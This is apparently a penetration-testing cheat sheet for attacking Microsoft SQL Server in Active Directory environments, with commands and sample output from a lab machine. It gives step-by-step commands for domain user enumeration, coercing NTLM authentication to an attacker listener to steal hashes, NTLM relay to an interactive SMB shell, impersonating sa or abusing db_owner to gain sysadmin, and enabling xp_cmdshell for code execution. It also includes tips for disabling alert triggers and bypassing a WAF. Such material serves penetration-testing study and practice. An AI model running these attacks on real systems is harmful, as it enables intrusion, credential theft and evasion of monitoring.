Usage Tips:
- Click on a keyword to enable inline editing.
- Click inside a code block to copy (excludes comments).
- Use the button to view examples.
- Click outside to collapse all examples.
Enum
1. Check Privesc Path
# Local auth
nxc mssql <TARGET> -u '<USER>' -p '<PASSWORD>' --local-auth -M mssql_priv
Sample Output:
TO-DO# Domain
nxc mssql <TARGET> -u '<USER>' -p '<PASSWORD>' -d '<DOMAIN>' -M mssql_priv
Sample Output:
TO-DO2. List Users that Can be Impersonated
# Local auth
nxc mssql <TARGET> -u '<USER>' -p '<PASSWORD>' --local-auth -M enum_impersonate
Sample Output:
$ nxc mssql DC.REDELEGATE.VL -u 'SQLGuest' -p 'zDPBpaF4FywlqIv11vii' --local-auth -M enum_impersonate
MSSQL 10.129.254.242 1433 DC [*] Windows Server 2022 Build 20348 (name:DC) (domain:redelegate.vl)
MSSQL 10.129.254.242 1433 DC [+] DC\SQLGuest:zDPBpaF4FywlqIv11vii
ENUM_IMP... 10.129.254.242 1433 DC [-] No users with impersonation rights found.
# Domain
nxc mssql <TARGET> -u '<USER>' -p '<PASSWORD>' -d '<DOMAIN>' -M enum_impersonate
Sample Output:
TO-DO3. Enumerate Active MSSQL Logins
# Local auth
nxc mssql <TARGET> -u '<USER>' -p '<PASSWORD>' --local-auth -M enum_logins
Sample Output:
$ nxc mssql DC.REDELEGATE.VL -u 'SQLGuest' -p 'zDPBpaF4FywlqIv11vii' --local-auth -M enum_logins
MSSQL 10.129.254.242 1433 DC [*] Windows Server 2022 Build 20348 (name:DC) (domain:redelegate.vl)
MSSQL 10.129.254.242 1433 DC [+] DC\SQLGuest:zDPBpaF4FywlqIv11vii
ENUM_LOGINS 10.129.254.242 1433 DC [+] Logins found:
ENUM_LOGINS 10.129.254.242 1433 DC [*] - sa
ENUM_LOGINS 10.129.254.242 1433 DC [*] - SQLGuest
# Domain
nxc mssql <TARGET> -u '<USER>' -p '<PASSWORD>' -d '<DOMAIN>' -M enum_logins
Sample Output:
TO-DO4. Enumerate Linked MSSQL Servers
# Local auth
nxc mssql <TARGET> -u '<USER>' -p '<PASSWORD>' --local-auth -M enum_links
Sample Output:
$ nxc mssql DC.REDELEGATE.VL -u 'SQLGuest' -p 'zDPBpaF4FywlqIv11vii' --local-auth -M enum_links
MSSQL 10.129.254.242 1433 DC [*] Windows Server 2022 Build 20348 (name:DC) (domain:redelegate.vl)
MSSQL 10.129.254.242 1433 DC [+] DC\SQLGuest:zDPBpaF4FywlqIv11vii
ENUM_LINKS 10.129.254.242 1433 DC [+] Linked servers found:
ENUM_LINKS 10.129.254.242 1433 DC [*] - WIN-Q13O908QBPG\SQLEXPRESS
# Domain
nxc mssql <TARGET> -u '<USER>' -p '<PASSWORD>' -d '<DOMAIN>' -M enum_links
Sample Output:
TO-DO1. Import Module
. .\PowerUpSQL.ps1
Sample Output:
TO-DO2. Audit
Invoke-SQLAudit -Instance <TARGET> -Username '<USER>' -Password '<PASSWORD>' -Verbose
Sample Output:
TO-DO3. Execute Query
Get-SQLQuery -Instance <TARGET> -Username '<USER>' -Password '<PASSWORD>' -Query "<QUERY>" -Verbose
Sample Output:
TO-DORef: PowerUpSQL.ps1
Domain Users Enum
1. Get Domain Name
SELECT DEFAULT_DOMAIN();
Sample Output:
SQL (SQLGuest guest@master)> SELECT DEFAULT_DOMAIN();
----------
REDELEGATE
2. Get Hex SID
SELECT master.dbo.fn_varbintohexstr(SUSER_SID('<DOMAIN>\Domain Admins'));
Sample Output:
SQL (SQLGuest guest@master)> SELECT master.dbo.fn_varbintohexstr(SUSER_SID('REDELEGATE\Domain Admins'));
----------------------------------------------------------
0x010500000000000515000000a185deefb22433798d8e847a00020000
3. Convert Hex SID to Readable String (Powershell)
# Without `0x`
$hexSid = "<HEX_SID>"
$sidBytes = [byte[]]::new($hexSid.Length / 2)
for ($i = 0; $i -lt $hexSid.Length; $i += 2) {
$sidBytes[$i / 2] = [Convert]::ToByte($hexSid.Substring($i, 2), 16)
}
$sid = New-Object System.Security.Principal.SecurityIdentifier($sidBytes, 0)
$sid.Value
Sample Output:
PS C:\Users\john> $hexSid = "010500000000000515000000a185deefb22433798d8e847a00020000"
PS C:\Users\john> $sidBytes = [byte[]]::new($hexSid.Length / 2)
PS C:\Users\john> for ($i = 0; $i -lt $hexSid.Length; $i += 2) {
>> $sidBytes[$i / 2] = [Convert]::ToByte($hexSid.Substring($i, 2), 16)
>> }
PS C:\Users\john> $sid = New-Object System.Security.Principal.SecurityIdentifier($sidBytes, 0)
PS C:\Users\john> $sid.value
S-1-5-21-4024337825-2033394866-2055507597-512
4. Domain Users Enum
#!/bin/bash
USERNAME="<USER>"
PASSWORD="<PASSWORD>"
SERVER="<TARGET>"
SID_BASE="<SID_BASE>"
query_sid() {
local sid="$1"
local full_sid="${SID_BASE}-${sid}"
local sql="SELECT SUSER_SNAME(SID_BINARY(N'$full_sid'))"
echo "$sql" | impacket-mssqlclient "$USERNAME:$PASSWORD@$SERVER" -file /dev/stdin 2>/dev/null | grep -a REDELEGATE
}
for sid in {1100..1200}; do
query_sid "$sid"
done
Sample Output:
$ ./domain_users_enum.sh
REDELEGATE\FS01$
REDELEGATE\Christine.Flanders
REDELEGATE\Marie.Curie
---[SNIP]---
1. Domain Users Enum
nxc mssql <TARGET> -u '<USER>' -p '<PASSWORD>' --local-auth --rid-brute
Sample Output:
$ nxc mssql DC.REDELEGATE.VL -u 'SQLGuest' -p 'zDPBpaF4FywlqIv11vii' --local-auth --rid-brute
MSSQL 10.129.254.242 1433 DC [*] Windows Server 2022 Build 20348 (name:DC) (domain:redelegate.vl)
MSSQL 10.129.254.242 1433 DC [+] DC\SQLGuest:zDPBpaF4FywlqIv11vii
MSSQL 10.129.254.242 1433 DC 498: REDELEGATE\Enterprise Read-only Domain Controllers
MSSQL 10.129.254.242 1433 DC 500: WIN-Q13O908QBPG\Administrator
---[SNIP]---
1. Metasploit
msfconsole
Sample Output:
TO-DO2. Use Module
use auxiliary/admin/mssql/mssql_enum_domain_accounts
Sample Output:
TO-DO3. Set Params
set RHOST <TARGET>
Sample Output:
msf6 auxiliary(admin/mssql/mssql_enum_domain_accounts) > set RHOST 10.129.234.50
RHOST => 10.129.234.50
set RPORT <PORT>
Sample Output:
msf6 auxiliary(admin/mssql/mssql_enum_domain_accounts) > set RPORT 1433
RPORT => 1433
set USERNAME <USER>
Sample Output:
msf6 auxiliary(admin/mssql/mssql_enum_domain_accounts) > set USERNAME SQLGuest
USERNAME => SQLGuest
set PASSWORD <PASSWORD>
Sample Output:
msf6 auxiliary(admin/mssql/mssql_enum_domain_accounts) > set PASSWORD zDPBpaF4FywlqIv11vii
PASSWORD => zDPBpaF4FywlqIv11vii
set fuzznum 10000
Sample Output:
msf6 auxiliary(admin/mssql/mssql_enum_domain_accounts) > set fuzznum 10000
fuzznum => 10000
4. Domain Users Enum
run
Sample Output:
msf6 auxiliary(admin/mssql/mssql_enum_domain_accounts) > run
[*] Running module against 10.129.234.50
[*] 10.129.234.50:1433 - Attempting to connect to the database server at 10.129.234.50:1433 as SQLGuest...
[+] 10.129.234.50:1433 - Connected.
[*] 10.129.234.50:1433 - SQL Server Name: WIN-Q13O908QBPG
[*] 10.129.234.50:1433 - Domain Name: REDELEGATE
[+] 10.129.234.50:1433 - Found the domain sid: 010500000000000515000000a185deefb22433798d8e847a
[*] 10.129.234.50:1433 - Brute forcing 10000 RIDs through the SQL Server, be patient...
[*] 10.129.234.50:1433 - - WIN-Q13O908QBPG\Administrator
[*] 10.129.234.50:1433 - - REDELEGATE\Guest
[*] 10.129.234.50:1433 - - REDELEGATE\krbtgt
[*] 10.129.234.50:1433 - - REDELEGATE\Domain Admins
---[SNIP]---
1. Import Module
Import-Module .\Get-SqlServer-Enum-WinAccounts.psm1
Sample Output:
*Evil-WinRM* PS C:\programdata> Import-Module .\Get-SqlServer-Enum-WinAccounts.psm1
Warning: Some imported command names contain one or more of the following restricted characters: # , ( ) {{ }} [ ] & - / \ $ ^ ; : " ' < > | ? @ ` * % + = ~
2. Domain Users Enum
Get-SqlServer-Enum-WinAccounts -SQLServerInstance '<TARGET>' -SqlUser '<USER>' -SqlPass '<PASSWORD>' –FuzzNum 10000
Sample Output:
*Evil-WinRM* PS C:\programdata> Get-SqlServer-Enum-WinAccounts -SQLServerInstance "10.129.234.50" -SqlUser 'SQLGuest' -SqlPass 'zDPBpaF4FywlqIv11vii' –FuzzNum 10000
[*] Attempting to authenticate to 10.129.234.50 as the login SQLGuest...
[*] Connected.
[*] Enumerating domain...
[*] Domain found: REDELEGATE
[*] Enumerating domain SID...
[*] Domain SID found: 010500000000000515000000A185DEEFB22433798D8E847A
[*] Brute forcing 10000 RIDs...
[*] - WIN-Q13O908QBPG\Administrator
[*] - REDELEGATE\Guest
[*] - REDELEGATE\krbtgt
[*] - REDELEGATE\Domain Guests
---[SNIP]---
[*] 34 domain accounts / groups were found.
name
----
REDELEGATE\Allowed RODC Password Replication Group
REDELEGATE\Cert Publishers
REDELEGATE\Christine.Flanders
---[SNIP]---
Abuse #1: Steal NTLM hash
1. Start a Listener
sudo responder -I tun0
Sample Output:
TO-DO2. Coercing Authentication
nxc mssql <TARGET> -u '<USER>' -p '<PASSWORD>' --local-auth -M mssql_coerce -o L=<LOCAL_IP>
Sample Output:
$ nxc mssql DC.REDELEGATE.VL -u 'SQLGuest' -p 'zDPBpaF4FywlqIv11vii' --local-auth -M mssql_coerce -o L=10.10.14.56
MSSQL 10.129.254.242 1433 DC [*] Windows Server 2022 Build 20348 (name:DC) (domain:redelegate.vl)
MSSQL 10.129.254.242 1433 DC [+] DC\SQLGuest:zDPBpaF4FywlqIv11vii
MSSQL_CO... 10.129.254.242 1433 DC [*] Commands executed successfully, check the listener for results
# Method 1
use master; exec xp_dirtree '\\<LOCAL_IP>\any\thing';
Sample Output:
TO-DO# Method 2
load_file('\\<LOCAL_IP>\any\thing');
Sample Output:
TO-DO# Method 3
SELECT * FROM sys.dm_os_file_exists('\\<LOCAL_IP>\any\thing')
Sample Output:
TO-DOAbuse #2: NTLM Relay Attack
1. Check if SMB Signing is False
nxc smb <TARGET> -u '<USER>' -p '<PASSWORD>' -d <DOMAIN>
Sample Output:
$ nxc smb MS01.example.com -u 'dev01' -p 'Initial123' -d example.com
SMB 10.10.132.54 445 MS01 [*] Windows Server 2022 Build 20348 x64 (name:MS01) (domain:example.com) (signing:False) (SMBv1:False)
2. Start a NTLM Relay Server [Cannot Relay to Host itself]
impacket-ntlmrelayx --no-http-server -smb2support -t <TARGET_DOMAIN> -i
Sample Output:
$ impacket-ntlmrelayx --no-http-server -smb2support -t DC01.example.com -i
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Protocol Client RPC loaded..
[*] Protocol Client SMTP loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client DCSYNC loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server on port 445
[*] Setting up WCF Server on port 9389
[*] Setting up RAW Server on port 6666
[*] Multirelay disabled
[*] Servers started, waiting for connections
[*] SMBD-Thread-4 (process_request_thread): Received connection from 10.10.132.54, attacking target smb://DC01.example.com
[*] Authenticating against smb://DC01.example.com as REFLECTION/SVC_WEB_STAGING SUCCEED
[*] Started interactive SMB client shell via TCP on 127.0.0.1:11000
3. Coercing Authentication
nxc mssql <TARGET> -u '<USER>' -p '<PASSWORD>' --local-auth -M mssql_coerce -o L=<LOCAL_IP>
Sample Output:
$ nxc mssql DC.REDELEGATE.VL -u 'SQLGuest' -p 'zDPBpaF4FywlqIv11vii' --local-auth -M mssql_coerce -o L=10.10.14.56
MSSQL 10.129.254.242 1433 DC [*] Windows Server 2022 Build 20348 (name:DC) (domain:redelegate.vl)
MSSQL 10.129.254.242 1433 DC [+] DC\SQLGuest:zDPBpaF4FywlqIv11vii
MSSQL_CO... 10.129.254.242 1433 DC [*] Commands executed successfully, check the listener for results
# Method 1
use master; exec xp_dirtree '\\<LOCAL_IP>\any\thing';
Sample Output:
TO-DO# Method 2
load_file('\\<LOCAL_IP>\any\thing');
Sample Output:
TO-DO4. Interactive SMB Shell
nc 127.0.0.0 <LOCAL_PORT>
Sample Output:
$ nc 127.0.0.1 11000
Type help for list of commands
# shares
ADMIN$
C$
IPC$
NETLOGON
SYSVOL
#
Abuse #3: Run xp_cmdshell
1. Check Any Policy Blocking xp_cmdshell [Optional]
select name from sys.server_triggers;
Sample Output:
TO-DO2. Disable Trigger if Any [Optional]
disable trigger ALERT_xp_cmdshell on all server;
Sample Output:
TO-DO3. Enable xp_cmdshell
enable_xp_cmdshell;
Sample Output:
TO-DO4. RCE
xp_cmdshell powershell.exe -ep bypass <CMD>
Sample Output:
TO-DOAbuse #4: Impersonate sa to run xp_cmdshell
1. Add User to Sysadmin
execute as login = 'sa'; exec sp_addsrvrolemember '<USER>','sysadmin'
Sample Output:
TO-DO2. Check
SELECT is_srvrolemember('sysadmin');
Sample Output:
TO-DO3. Enable xp_cmdshell
execute as login = 'sa'; exec sp_configure 'show advanced options', 1;
Sample Output:
TO-DOexecute as login = 'sa'; reconfigure;
Sample Output:
TO-DOexecute as login = 'sa'; exec sp_configure 'xp_cmdshell', 1;
Sample Output:
TO-DOexecute as login = 'sa'; reconfigure;
Sample Output:
TO-DO4. RCE
execute as login = 'sa'; EXEC master..xp_cmdshell 'powershell.exe -ep bypass <CMD>'
Sample Output:
TO-DONote: try xp_cmDshElL to bypass WAF
Abuse #5: Exploit DB Owner
1. Check Trustworthy Databases
SELECT a.name,b.is_trustworthy_on FROM master..sysdatabases as a INNER JOIN sys.databases as b ON a.name=b.name;
Sample Output:
name is_trustworthy_on
------------
master 0
tempdb 0
model 0
msdb 1
2. Check DB Owner
# Select target db
USE <TARGET_DB>;
Sample Output:
TO-DO# With target db in use
SELECT rp.name as database_role, mp.name as database_user from sys.database_role_members drm join sys.database_principals rp on (drm.role_principal_id = rp.principal_id) join sys.database_principals mp on (drm.member_principal_id = mp.principal_id)
Sample Output:
SQLAgentUserRole SQLAgentReaderRole
SQLAgentReaderRole SQLAgentOperatorRole
SQLAgentUserRole dc_operator
db_ssisltduser dc_operator
db_ssisoperator dc_operator
dc_operator dc_admin
db_ssisltduser dc_proxy
db_ssisoperator dc_proxy
SQLAgentUserRole MS_DataCollectorInternalUser
db_ssisoperator MS_DataCollectorInternalUser
dc_admin MS_DataCollectorInternalUser
SQLAgentOperatorRole PolicyAdministratorRole
ServerGroupReaderRole ServerGroupAdministratorRole
PolicyAdministratorRole ##MS_PolicyEventProcessingLogin##
PolicyAdministratorRole ##MS_PolicyTsqlExecutionLogin##
UtilityIMRReader UtilityIMRWriter
db_owner EXAMPLE\svc_sql
(18 rows affected)
3. Exploit DB Owner
CREATE OR ALTER PROCEDURE dbo.test WITH EXECUTE AS owner AS ALTER SERVER ROLE sysadmin ADD MEMBER [<DB_OWNER>];
Sample Output:
TO-DOEXEC dbo.test;
Sample Output:
TO-DOEXEC sp_configure 'show advanced options', 1; Reconfigure;
Sample Output:
TO-DOEXEC sp_configure 'xp_cmdshell', 1; Reconfigure;
Sample Output:
TO-DOEXEC xp_cmdshell '<CMD>'
Sample Output:
TO-DOAbuse #6: Run External Script
1. Run External Script (Python)
EXEC sp_execute_external_script @language =N'Python', @script = N'import os; os.system("<CMD>");';
Sample Output:
TO-DO